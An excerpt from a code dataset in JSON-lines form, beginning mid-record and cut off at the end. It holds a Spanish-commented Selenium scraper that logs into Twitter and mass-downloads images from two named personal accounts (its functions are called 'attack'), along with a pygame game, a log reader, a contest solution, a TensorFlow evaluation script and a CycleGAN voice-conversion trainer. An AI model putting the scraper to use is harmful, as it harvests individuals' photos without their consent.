Carrusel not finded')\n return\n\n # clic on next\n try:\n for i in range(max_images):\n next = driver.find_element(\n By.XPATH, '//div[@aria-label=\"Next slide\"]')\n sleep(0.4)\n next.click()\n except:\n print('Error clicking Next on carrusel')\n\n # get the images\n imgs = driver.find_elements(By.XPATH, '//li//img[@alt=\"Image\"]')\n imgs = [i.get_attribute('src') for i in imgs]\n\n # returns a list of image urls\n return imgs\n\n# Listar todos los nombres de perfiiles\n\n\ndef list_following(account):\n log('Listing following accounts')\n\n path = 'https://twitter.com/'+account+'/following'\n driver.get(path)\n sleep(5)\n following_list = []\n following_list = driver.find_elements(\n By.XPATH, '//div[@data-testid=\"cellInnerDiv\"]//div[@class=\"css-1dbjc4n r-1awozwy r-18u37iz r-1wbh5a2\"]')\n following_list = [i.text for i in following_list]\n\n print(following_list)\n print(len(following_list))\n\n return following_list\n\n\ndef login_twitter():\n log('Logging to twitter')\n\n # Login to twitter\n driver.get(\"https://www.twitter.com/login\")\n\n # login\n # set user\n username = driver.find_element(By.XPATH, '//input[@name=\"text\"]')\n username.send_keys(keys.USER)\n\n # Click on \"Next\"\n btn_next = driver.find_element(By.XPATH, '//div[@role=\"button\"][2]')\n btn_next.click()\n\n # set password\n password = driver.find_element(By.NAME, 'password')\n password.send_keys(keys.PASS)\n\n # click on login\n submit = driver.find_element(\n By.XPATH, '//div[@data-testid=\"LoginForm_Login_Button\"]')\n submit.click()\n\n sleep(2)\n\n\ndef print_dict(dictionary):\n print(json.dumps(dictionary, sort_keys=True, indent=4))\n\n\ndef url_to_dict(dictionary, img_weburl, account):\n log(f'Url {img_weburl} to dictionary in {account}')\n\n accout_names = list(dictionary.keys())\n if account in accout_names:\n # print('existe la cuentaa: ' + account)\n if img_weburl in dictionary[account]:\n # print(f'existe la url: {img_weburl}')\n pass\n else:\n # print(f'+ adding url {img_weburl}')\n dictionary[account].append(img_weburl)\n else:\n print(f'+ adding [{account}] to the dictionary')\n dictionary[account] = [img_weburl]\n\n return dictionary\n\n# Busca las cuentas de perfils_list, les roba las imagenes y guarda info en un archivo\n\n\ndef image_exist(folder:str, nombre:str):\n archivo = f'{nombre}.png'\n return archivo in os.listdir(folder)\n\ndef attack(account: str):\n log(f'Attacking {account}...')\n\n # obtiene una lista de urls de las imagenes\n image_url_list = get_images_from(account)\n\n # cancela el ataque si no hay imagenes\n if image_url_list == None:\n log('- No se encontraron imagenes')\n return\n\n ## descarga cada imagen de la lista --------------------------\n \n idx = 0 # contador para el nombre de las imagenes\n perfils_dict = load_accounts_dict() # carga el diccionario\n \n for web_url in image_url_list:\n # comprueba si la url existe en el diccionario, si existe: no la descarga\n if account not in perfils_dict.keys() or web_url not in perfils_dict.get(account):\n # descargar la imagen ---------------------------------\n folder = images_path + account\n download_image(web_url, folder, idx)\n perfils_dict = url_to_dict(perfils_dict, web_url, account)\n idx += 1\n else:\n log('- La imagen ya existe en el diccionario')\n \n save_accounts_dict(perfils_dict) # guarda el diccionario\n\ndef attack_list(perfils_list: list):\n for account in perfils_list:\n attack(account)\n\n\ndef log(msg):\n if verbose:\n print(f'log: {msg}')\n\n# RECORDATORIO - Para funciones como esta, que realizan una 
acción a cada uno\n# de los elementos de esa lista. Crea una función que solo se lo haga a un elemento y\n# crea otra que reciba la lista y la itere\n\n\nif __name__ == '__main__':\n verbose = True\n max_images = 4\n login_twitter()\n # cuentas = list(load_accounts_dict().keys())\n cuentas = ['meowinxi', 'Brananaxx']\n # attack_list(cuentas)\n","repo_name":"CotherArt/lew-spider","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6839,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8647659021","text":"import pygame\nimport os\nfrom Background import Background\nfrom Obstacle import Obstacle\nfrom Cloud import Cloud\nfrom Button import Button\nimport sys\nimport random\nimport json\n\npygame.init()\n\nWIDTH, HEIGHT = 900, 500\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\n\nSCORE_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 32)\nESC_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 24)\nGAME_END_FONT = SCORE_FONT\nEND_SCORE_FONT = pygame.font.Font(\"font/pixel_font.ttf\", 22)\n\npygame.display.set_caption('PyWings')\nBG = Background(WIN)\nBG_IMAGE = pygame.transform.scale(\n pygame.image.load('images/bg.jpg'), (900, 500))\n\nLOGO = pygame.transform.scale(\n pygame.image.load('images/logo.png'), (772, 170))\n\nSPEAKER_ON = pygame.transform.scale(\n pygame.image.load('images/speaker_on.png'), (65, 50))\n\nSPEAKER_OFF = pygame.transform.scale(\n pygame.image.load('images/speaker_off.png'), (65, 50))\n\nsound_mode = True\n\npygame.mixer.init()\n\nengine = pygame.mixer.Sound(os.path.join('sounds', 'engine.ogg'))\nmusic = [pygame.mixer.Sound(os.path.join('sounds', 'bg_music1.ogg')), pygame.mixer.Sound(\n os.path.join('sounds', 'bg_music2.ogg'))]\n\ncollision = pygame.mixer.Sound(os.path.join('sounds', 'collision.ogg'))\ncollision.set_volume(0.6)\n\nengine.set_volume(0.2)\n\nfor i in range(len(music)):\n music[i].set_volume(0.2)\n\nSONG_END = pygame.USEREVENT+1\n\npygame.mixer.Channel(1).play(music[random.randint(0, 1)])\npygame.mixer.Channel(1).set_endevent(SONG_END)\n\n# DEV mute\n# pygame.mixer.Channel(1).stop()\n# pygame.mixer.Channel(0).stop()\n\n\ndef play():\n\n FPS = 60\n VEL = 8\n\n BORDER = pygame.Rect(WIDTH//2 - 5, 0, 0, HEIGHT)\n\n PLANE_WIDTH, PLANE_HEIGHT = 100, 60\n\n PLANE_IMAGE = pygame.image.load(\n os.path.join('images', 'plane.png'))\n\n PLANE = pygame.transform.scale(\n PLANE_IMAGE, (PLANE_WIDTH, PLANE_HEIGHT))\n\n ESC = pygame.image.load(os.path.join('images', 'esc_button.png'))\n\n PLANE_ROTATE_UP = pygame.transform.rotate(PLANE, 15)\n PLANE_ROTATE_DOWN = pygame.transform.rotate(PLANE, -15)\n\n global highscore\n highscore = 0\n\n if os.path.exists('data.json'):\n with open('data.json', 'r') as f:\n data = json.load(f)\n if data['highscore'] != 0:\n highscore = data['highscore']\n else:\n highscore = 0\n\n def draw_window(plane, score, keys_pressed, clouds):\n # WIN.blit(BG, (0, 0))\n\n pygame.draw.rect(WIN, (0, 0, 0), BORDER)\n\n if keys_pressed[pygame.K_UP] and plane.y - VEL > 0:\n WIN.blit(PLANE_ROTATE_UP, plane)\n elif keys_pressed[pygame.K_DOWN] and plane.y + VEL + plane.height < HEIGHT - 15:\n WIN.blit(PLANE_ROTATE_DOWN, plane)\n else:\n WIN.blit(PLANE, plane)\n\n WIN.blit(score, (10, 10))\n WIN.blit(SCORE_FONT.render(\n f\"Najlepszy wynik: {highscore}\", 1, 'black'), (10, 40))\n WIN.blit(ESC, (10, 85))\n\n WIN.blit(ESC_FONT.render('- wyjdz do menu', 1, (0, 0, 0)), (55, 80))\n\n pygame.display.update()\n\n def handle_movement(keys_pressed, plane):\n if 
keys_pressed[pygame.K_LEFT] and plane.x - VEL > 0:\n plane.x -= VEL\n if keys_pressed[pygame.K_RIGHT] and plane.x + VEL + plane.width < BORDER.x:\n plane.x += VEL\n if keys_pressed[pygame.K_UP] and plane.y - VEL > 0:\n plane.y -= VEL\n if keys_pressed[pygame.K_DOWN] and plane.y + VEL + plane.height < HEIGHT - 15:\n plane.y += VEL\n\n if keys_pressed[pygame.K_ESCAPE]:\n main_menu()\n\n def main():\n plane = pygame.Rect(100, 100, PLANE_WIDTH, PLANE_HEIGHT)\n\n if sound_mode:\n pygame.mixer.Channel(0).play(engine, -1)\n else:\n pass\n\n # pygame.mouse.set_visible(False)\n\n pygame.mouse.set_pos((WIDTH//4, HEIGHT//2))\n\n clock = pygame.time.Clock()\n run = True\n pipe_spawn_timer = 0\n cloud_spawn_timer = 0\n\n pipes = []\n clouds = []\n gap_between_pipes = 100\n gap_between_upper_and_lower_pipe = 200\n movement_speed = 10\n\n score = 0\n\n while run:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEMOTION:\n if event.pos[0] > BORDER.x:\n plane.x = BORDER.x - plane.width//2\n plane.y = event.pos[1] - plane.height//2\n else:\n plane.move_ip(\n event.pos[0] - plane.centerx, event.pos[1] - plane.centery)\n\n if event.type == SONG_END:\n pygame.mixer.Channel(1).play(music[random.randint(0, 1)])\n\n BG.update()\n BG.render()\n\n pipe_spawn_timer += 1\n cloud_spawn_timer += 1\n\n if pipe_spawn_timer >= gap_between_pipes: # use different values for distance between pipes\n pipes.append(\n Obstacle(WIN, gap_between_upper_and_lower_pipe, movement_speed))\n pipe_spawn_timer = 0\n\n if cloud_spawn_timer >= 75:\n clouds.append(Cloud(WIN))\n cloud_spawn_timer = 0\n\n for cloud in clouds:\n cloud.draw()\n cloud.update()\n\n for pipe in pipes:\n pipe.draw()\n pipe.update()\n\n if pipe.collide(plane):\n run = False # reset the game\n if sound_mode:\n pygame.mixer.Channel(2).play(collision)\n pygame.mixer.Channel(0).stop()\n\n for pipe in pipes:\n if pipe.score(plane):\n score += 1\n if gap_between_pipes != 20:\n gap_between_pipes -= 2\n if gap_between_upper_and_lower_pipe != plane.height + 20:\n gap_between_upper_and_lower_pipe -= 2\n\n movement_speed += .2\n\n # first pipe will be leftmost pipe.\n if pipes and pipes[0].upper_rect.right < 0:\n pipes.pop(0)\n\n keys_pressed = pygame.key.get_pressed()\n handle_movement(keys_pressed, plane)\n\n score_text = SCORE_FONT.render(\n f\"Wynik: {score}\", 1, (0, 0, 0))\n\n draw_window(plane, score_text, keys_pressed, clouds)\n\n # End screen\n end_screen(score)\n main()\n\n\ndef end_screen(score):\n run = True\n\n end_score_text = END_SCORE_FONT.render(\n f\"Twój wynik: {score}\", 1, 'black')\n end_text = GAME_END_FONT.render(\"Koniec gry!\", 1, 'black')\n SPACE = pygame.image.load(os.path.join('images', 'space_button.png'))\n\n s = pygame.Surface((375, 150)) # the size of your rect\n s.set_alpha(128) # alpha level\n s.fill((255, 255, 255))\n WIN.blit(s, (WIDTH//2 - end_text.get_width() //\n 2 - 10, HEIGHT-(HEIGHT//1.1)))\n\n if os.path.exists('data.json'):\n with open('data.json', 'r') as f:\n data = json.load(f)\n if score > data['highscore']:\n data['highscore'] = score\n with open('data.json', 'w') as f:\n json.dump(data, f)\n else:\n data = {'highscore': score}\n with open('data.json', 'w') as f:\n json.dump(data, f)\n\n while run:\n\n # pygame.draw.rect(WIN, (0, 0, 0, 0.5), score_rect)\n WIN.blit(end_text, (WIDTH//2 - end_text.get_width() //\n 2, HEIGHT-(HEIGHT//1.1)))\n WIN.blit(end_score_text, (WIDTH//2 - end_text.get_width() //\n 2, 
HEIGHT-(HEIGHT//1.2)))\n\n WIN.blit(SPACE, (WIDTH//2 - end_text.get_width() //\n 2, HEIGHT-(HEIGHT//1.4)))\n\n WIN.blit(ESC_FONT.render('- spróbuj jeszcze raz', 1, 'black'), (WIDTH//2 - end_text.get_width() //\n 2 + 70, HEIGHT-(HEIGHT//1.4)-10))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.K_ESCAPE:\n run = False\n main_menu()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n run = False\n play()\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n run = False\n main_menu()\n\n pygame.display.update()\n\n\ndef main_menu():\n\n global sound_mode\n\n pygame.mouse.set_visible(True)\n\n pygame.mixer.Channel(0).stop()\n\n if sound_mode:\n SPEAKER_BUTTON = Button(image=SPEAKER_ON, pos=(WIDTH-50, HEIGHT-50),\n text_input=\"\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n else:\n SPEAKER_BUTTON = Button(image=SPEAKER_OFF, pos=(WIDTH-50, HEIGHT-50),\n text_input=\"\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n while True:\n WIN.blit(BG_IMAGE, (0, 0))\n\n MENU_MOUSE_POS = pygame.mouse.get_pos()\n\n MENU_RECT = LOGO.get_rect(center=(WIDTH//2, HEIGHT//2-150))\n\n PLAY_BUTTON = Button(image=pygame.transform.scale(pygame.image.load(\"images/Play Rect.png\"), (200, 50)), pos=(WIDTH//2, HEIGHT//2),\n text_input=\"GRAJ\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n QUIT_BUTTON = Button(image=pygame.transform.scale(pygame.image.load(\"images/Quit Rect.png\"), (200, 50)), pos=(WIDTH//2, HEIGHT//2+75),\n text_input=\"WYJDZ\", font=pygame.font.Font(\n \"font/pixel_font.ttf\", 32), base_color=\"#d7fcd4\", hovering_color=\"White\")\n\n WIN.blit(LOGO, MENU_RECT)\n\n for button in [PLAY_BUTTON, SPEAKER_BUTTON, QUIT_BUTTON]:\n button.changeColor(MENU_MOUSE_POS)\n button.update(WIN)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n if PLAY_BUTTON.checkForInput(MENU_MOUSE_POS):\n play()\n if QUIT_BUTTON.checkForInput(MENU_MOUSE_POS):\n pygame.quit()\n sys.exit()\n if SPEAKER_BUTTON.checkForInput(MENU_MOUSE_POS):\n if SPEAKER_BUTTON.image == SPEAKER_ON:\n SPEAKER_BUTTON.image = SPEAKER_OFF\n pygame.mixer.Channel(0).stop()\n pygame.mixer.Channel(1).stop()\n sound_mode = False\n else:\n SPEAKER_BUTTON.image = SPEAKER_ON\n pygame.mixer.Channel(1).play(\n music[random.randint(0, 1)])\n sound_mode = True\n\n if event.type == SONG_END:\n pygame.mixer.Channel(1).play(music[random.randint(0, 1)])\n\n pygame.display.update()\n\n\nif __name__ == '__main__':\n main_menu()\n","repo_name":"MatiuDev/PyWings","sub_path":"PyWings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"30794743841","text":"# This is a sample Python script.\nimport importlib\nimport os\nimport threading\nimport traceback\nfrom collections import deque\nfrom os import cpu_count\n\nfrom rx.core.observer import AutoDetachObserver\nfrom rx.subject import Subject\n\nimport log_translate.globals\nfrom log_translate.config_default import translators\nfrom log_translate.data_struct import Log, Level\nfrom log_translate.globals import remember_values_reset\n\n\n# //必须定义在使用者前面\nclass LogReader(object):\n def __init__(self,\n chunk_size=1024 * 1024 * 
10,\n process_num_for_log_parsing=cpu_count()):\n self.log_unparsed_queue = deque() # 用于存储未解析日志\n self.log_line_parsed_queue = deque() # 用于存储已解析日志行\n self.is_all_files_read = False # 标识是否已读取所有日志文件\n self.process_num_for_log_parsing = process_num_for_log_parsing # 并发解析日志文件进程数\n self.chunk_size = chunk_size # 每次读取日志的日志块大小\n self.files_read_list = [] # 存放已读取日志文件\n self.log_parsing_finished = False # 标识是否完成日志解析\n self.log_stream = Subject()\n # 翻译\n try:\n config = importlib.import_module(\"config\")\n self.log_translators = getattr(config, \"translators\")\n except:\n self.log_translators = translators\n traceback.print_exc()\n # 要在读取了配置之后设置\n self.log_stream._subscribe_core(AutoDetachObserver(on_next=log_translate.globals.log_watcher))\n\n @staticmethod\n def readFile(path=\".\"):\n with open(path, \"rb\") as f:\n for fline in f:\n yield fline\n f.close()\n\n def analyze(self, path):\n # 分行读取数据\n remember_values_reset()\n for datas in self.readFile(path):\n # 对日志进行翻译\n try:\n str = datas.decode('ISO-8859-1').strip()\n for translator in self.log_translators:\n try:\n # 读取的字符串如果是\\x000这种表示文件没有用utf-8保存\n result = translator.translate(str)\n # 翻译后的日志通过RxStream转发出去\n if result:\n result.origin = str\n # if len(self.log_stream.observers) == 0:\n # result.print()\n self.log_stream.on_next(result)\n break\n except Exception as e:\n print(f'日志翻译发生异常:{e} -> ${str}')\n traceback.print_exc()\n self.log_stream.on_next(\n Log(translated=\"日志翻译发生异常:%s \\n%s\" % (str, traceback.format_exc()), level=Level.e)\n )\n except Exception as e:\n print('文件解析发生异常:', e)\n traceback.print_exc()\n self.log_stream.on_next(Log(translated=\"文件解析发生异常:%s\" % traceback.format_exc(), level=Level.e))\n self.log_stream.on_next(Log(translated=None))\n\n def concurrency(self, log_files):\n # 多线程 解析\n for file in log_files:\n abspath = os.path.abspath(file)\n print(abspath)\n threading_thread = threading.Thread(target=self.analyze, name=\"read_log_file\", args=(abspath,))\n threading_thread.start()\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n parse_log = LogReader()\n # parse_log.concurrency([\"D:\\\\main_log_1__2023_0429_100141\"])\n # parse_log.concurrency([\"./android-0823_232307-1.txt\"])\n parse_log.concurrency([\"./main_log_1__2023_0429_100141.txt\"])\n","repo_name":"5hmlA/pyTools","sub_path":"log_translate/log_translate/read_log_file.py","file_name":"read_log_file.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"22137290788","text":"def solve():\r\n #n = int(input())\r\n n, k = map(int, input().split()) \r\n #a = list(map(int, input().split())) \r\n a = list(map(str, input())) \r\n \r\n dic = {}\r\n for i in a:\r\n if i in dic:\r\n dic[i] += 1\r\n else:\r\n dic[i] = 1 \r\n v = list(dic.values())\r\n pairs = singles = 0\r\n for i in v:\r\n if i % 2 == 0:\r\n pairs += i // 2\r\n i = 0\r\n else:\r\n pairs += (i - 1) // 2\r\n singles += 1\r\n \r\n ans = 2 * (pairs // k) \r\n pairs = max(0, pairs - (ans // 2) * k)\r\n singles += 2 * pairs \r\n if singles >= k:\r\n ans += 1\r\n print(ans)\r\n \r\nfor _ in range(int(input())):\r\n solve()\r\n\r\n ","repo_name":"mlabeeb03/codeforces","sub_path":"Palindromes Coloring.py","file_name":"Palindromes Coloring.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37527929339","text":"# verbose to stdout or log to file (in another format)\n\nfrom 
__future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport reader, os\nfrom model import PIModel\nimport numpy as np\nfrom sklearn.metrics import f1_score\nimport tensorflow as tf\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\"config_path\", \"conf.py\", \"config_path\")\n\nFLAGS = flags.FLAGS\n\ndef run_eval(session, m, data, eval_op):\n \"\"\"Runs the model on the given data.\"\"\"\n num_epoch = len(data[0]) // m.batch_size\n costs = 0.0\n iters = 0\n totalacc = 0.0\n preds = []\n for step, (prem, hyp, premmask, hypmask, label) in enumerate(reader.pi_iterator(data, m.batch_size, reshuffle=False)):\n pred, cost, state, acc, _ = session.run([m.pred, m.cost, m.final_state, m.acc, eval_op], # eliminated m.acc\n {m.input_prem: prem,\n m.input_hyp: hyp,\n m.prem_mask: premmask,\n m.hyp_mask: hypmask,\n m.targets: label})\n costs += cost\n totalacc += acc\n iters += 1\n preds += list(pred)\n return preds, costs / iters, totalacc / iters\n\ndef get_config(config_path):\n class conf(object): pass\n with open(config_path) as f:\n for line in f:\n if 'import' not in line and len(line) > 0:\n exec(\"conf.\"+line[:-1])\n return conf\n\ndef main(_):\n if not FLAGS.config_path:\n raise ValueError(\"Must set --config_path\")\n\n single_preset = get_config(FLAGS.config_path)\n raw_data = reader.pi_raw_data(single_preset.data_path)\n train_data, valid_data, test_data = raw_data\n\n single_preset.batch_size = 1\n\n with tf.Graph().as_default(), tf.Session() as session:\n initializer = tf.random_normal_initializer(mean=0.0,\n stddev=single_preset.init_scale)\n\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n m_val = PIModel(is_training=False, num_steps_prem=max(valid_data[2])+1,\n num_steps_hyp=max(valid_data[3])+1, preset=single_preset)\n\n with tf.variable_scope(\"model\", reuse=True, initializer=initializer):\n m_test = PIModel(is_training=False, num_steps_prem=max(test_data[2])+1,\n num_steps_hyp=max(test_data[3])+1, preset=single_preset)\n\n\n tf.global_variables_initializer().run()\n\n # Retrieving model checkpoint\n saver = tf.train.Saver()\n ckpt = tf.train.get_checkpoint_state(single_preset.checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(session, ckpt.model_checkpoint_path)\n else:\n raise ValueError(\"No checkpoint found. 
Set a valid --checkpoint_path for model evaluation\")\n\n # m.assign_lr(session, batch_preset.learning_rate)\n\n val_pred, valid_loss, valid_acc = run_eval(session, m_val, valid_data, tf.no_op())\n print(\"Val loss: %.3f, acc: %.3f\\n\" % (valid_loss, valid_acc))\n\n test_pred, test_loss, test_acc = run_eval(session, m_test, test_data, tf.no_op())\n print(\"Test loss: %.3f, acc: %.3f\\n\" % (test_loss, test_acc))\n\n with open(os.path.join(single_preset.data_path,'pred.val'),'w') as f:\n for p in val_pred:\n f.write(reader._revert(p) + '\\n')\n with open(os.path.join(single_preset.data_path,'pred.test'), 'w') as g:\n for p in test_pred:\n g.write(reader._revert(p) + '\\n')\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"pakapol/phrasal-implicatives","sub_path":"dataGen/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"45612318224","text":"import os\nimport numpy as np\nimport argparse\nimport time\nimport librosa\nimport soundfile as sf\nimport math\nimport pickle\n\nfrom preprocess import *\nfrom model import CycleGAN \nimport tensorflow as tf\n\ndef loadPickleFile(fileName):\n with open(fileName, 'rb') as f:\n return pickle.load(f)\n\ndef train(train_dir=None, model_dir=None, model_name=None, random_seed=None, validation_A_dir=None, validation_B_dir=None, output_dir=None, tensorboard_log_dir=None,model_weights_dir = None,add_noise=False):\n\n np.random.seed(random_seed)\n\n num_epochs = 5000\n mini_batch_size = 1 # mini_batch_size = 1 is better\n generator_learning_rate = 0.0002\n generator_learning_rate_decay = generator_learning_rate / 200000\n discriminator_learning_rate = 0.0001\n discriminator_learning_rate_decay = discriminator_learning_rate / 200000\n sampling_rate = 16000\n num_mcep = 24\n frame_period = 5.0\n n_frames = 128\n lambda_cycle = 10\n lambda_identity = 5\n\n log_files = np.load(os.path.join(train_dir, 'logf0s_normalization.npz'))\n log_f0s_mean_A, log_f0s_std_A, log_f0s_mean_B, log_f0s_std_B = log_files['log_f0s_mean_A'],log_files['log_f0s_std_A'],log_files['log_f0s_mean_B'],log_files['log_f0s_std_B']\n\n mcep_files = np.load(os.path.join(train_dir, 'mcep_normalization.npz'))\n coded_sps_A_mean,coded_sps_A_std,coded_sps_B_mean,coded_sps_B_std = mcep_files['coded_sps_A_mean'],mcep_files['coded_sps_A_std'],mcep_files['coded_sps_B_mean'],mcep_files['coded_sps_B_std']\n \n coded_sps_A_norm, coded_sps_B_norm = loadPickleFile(os.path.join(train_dir, 'coded_sps_A_norm.pickle')), loadPickleFile(os.path.join(train_dir, 'coded_sps_B_norm.pickle'))\n\n if validation_A_dir is not None:\n validation_A_output_dir = os.path.join(output_dir, 'converted_A')\n if not os.path.exists(validation_A_output_dir):\n os.makedirs(validation_A_output_dir)\n\n if validation_B_dir is not None:\n validation_B_output_dir = os.path.join(output_dir, 'converted_B')\n if not os.path.exists(validation_B_output_dir):\n os.makedirs(validation_B_output_dir)\n\n\n model = CycleGAN(num_features = num_mcep,num_frames=n_frames,add_noise=add_noise)\n if model_weights_dir is not None:\n model.load(model_weights_dir)\n\n for epoch in range(num_epochs):\n \n print('Epoch: %d' % epoch)\n '''\n if epoch > 60:\n lambda_identity = 0\n if epoch > 1250:\n generator_learning_rate = max(0, generator_learning_rate - 0.0000002)\n discriminator_learning_rate = max(0, discriminator_learning_rate - 0.0000001)\n '''\n\n start_time_epoch = time.time()\n\n dataset_A, dataset_B 
= sample_train_data(dataset_A = coded_sps_A_norm, dataset_B = coded_sps_B_norm, n_frames = n_frames)\n\n n_samples = dataset_A.shape[0]\n\n for i in range(n_samples // mini_batch_size):\n num_iterations = (n_samples // mini_batch_size) * epoch + i\n\n if num_iterations > 5000:\n lambda_identity = 0\n if num_iterations > 2*1e4:\n generator_learning_rate = max(0, generator_learning_rate - generator_learning_rate_decay)\n discriminator_learning_rate = max(0, discriminator_learning_rate - discriminator_learning_rate_decay)\n\n start = i * mini_batch_size\n end = (i + 1) * mini_batch_size\n generator_loss, discriminator_loss = model.forward_pass(dataset_A[start:end],dataset_B[start:end],lambda_cycle,lambda_identity,generator_learning_rate,discriminator_learning_rate)\n\n if i % 50 == 0:\n #print('Iteration: %d, Generator Loss : %f, Discriminator Loss : %f' % (num_iterations, generator_loss, discriminator_loss))\n print('Iteration: {:07d}, Generator Learning Rate: {:.7f}, Discriminator Learning Rate: {:.7f}, Generator Loss : {:.3f}, Discriminator Loss : {:.3f}'.format(num_iterations, generator_learning_rate, discriminator_learning_rate, generator_loss, discriminator_loss))\n\n # model.save(directory = model_dir, filename = model_name)\n if epoch%5==0:\n print(\"Saving model...\")\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\n end_time_epoch = time.time()\n time_elapsed_epoch = end_time_epoch - start_time_epoch\n\n print('Time Elapsed for This Epoch: %02d:%02d:%02d' % (time_elapsed_epoch // 3600, (time_elapsed_epoch % 3600 // 60), (time_elapsed_epoch % 60 // 1)))\n\n if validation_A_dir is not None:\n if num_iterations % 1000 == 0:\n print('Generating Validation Data B from A...')\n for file in os.listdir(validation_A_dir):\n filepath = os.path.join(validation_A_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_A, std_log_src = log_f0s_std_A, mean_log_target = log_f0s_mean_B, std_log_target = log_f0s_std_B)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = np.array((coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std)\n padding = np.zeros((coded_sp_norm.shape[0],n_frames*math.ceil(coded_sp_norm.shape[1]/n_frames) - coded_sp_norm.shape[1]))\n padded_coded_sp_norm = np.concatenate([coded_sp_norm,padding],axis=1)\n preds= []\n for start_frame in range(0,padded_coded_sp_norm.shape[1],n_frames):\n preds.append(np.squeeze(model.test(np.expand_dims(padded_coded_sp_norm[:,start_frame:start_frame+n_frames],axis=0), 'A2B').numpy(),axis=0))\n coded_sp_converted_norm = np.concatenate(preds,axis=1)\n coded_sp_converted = coded_sp_converted_norm[:,:coded_sp_norm.shape[1]] * coded_sps_B_std + coded_sps_B_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n # librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate)\n 
sf.write(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\n\n if validation_B_dir is not None:\n # if num_iterations % 1000 == 0:\n print('Generating Validation Data A from B...')\n for file in os.listdir(validation_B_dir):\n filepath = os.path.join(validation_B_dir, file)\n wav, _ = librosa.load(filepath, sr = sampling_rate, mono = True)\n wav = wav_padding(wav = wav, sr = sampling_rate, frame_period = frame_period, multiple = 4)\n f0, timeaxis, sp, ap = world_decompose(wav = wav, fs = sampling_rate, frame_period = frame_period)\n f0_converted = pitch_conversion(f0 = f0, mean_log_src = log_f0s_mean_B, std_log_src = log_f0s_std_B, mean_log_target = log_f0s_mean_A, std_log_target = log_f0s_std_A)\n coded_sp = world_encode_spectral_envelop(sp = sp, fs = sampling_rate, dim = num_mcep)\n coded_sp_transposed = coded_sp.T\n coded_sp_norm = np.array((coded_sp_transposed - coded_sps_B_mean) / coded_sps_B_std)\n padding = np.zeros((coded_sp_norm.shape[0],n_frames*math.ceil(coded_sp_norm.shape[1]/n_frames) - coded_sp_norm.shape[1]))\n padded_coded_sp_norm = np.concatenate([coded_sp_norm,padding],axis=1)\n preds= []\n for start_frame in range(0,padded_coded_sp_norm.shape[1],n_frames):\n preds.append(np.squeeze(model.test(np.expand_dims(padded_coded_sp_norm[:,start_frame:start_frame+n_frames],axis=0), 'B2A').numpy(),axis=0))\n coded_sp_converted_norm = np.concatenate(preds,axis=1)\n coded_sp_converted = coded_sp_converted_norm[:,:coded_sp_norm.shape[1]] * coded_sps_A_std + coded_sps_A_mean\n coded_sp_converted = coded_sp_converted.T\n coded_sp_converted = np.ascontiguousarray(coded_sp_converted)\n decoded_sp_converted = world_decode_spectral_envelop(coded_sp = coded_sp_converted, fs = sampling_rate)\n wav_transformed = world_speech_synthesis(f0 = f0_converted, decoded_sp = decoded_sp_converted, ap = ap, fs = sampling_rate, frame_period = frame_period)\n sf.write(os.path.join(validation_B_output_dir, os.path.basename(file)), wav_transformed, sampling_rate, 'PCM_24')\n model.save(model_dir,f\"{model_name}_epoch{epoch}\")\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description = 'Train 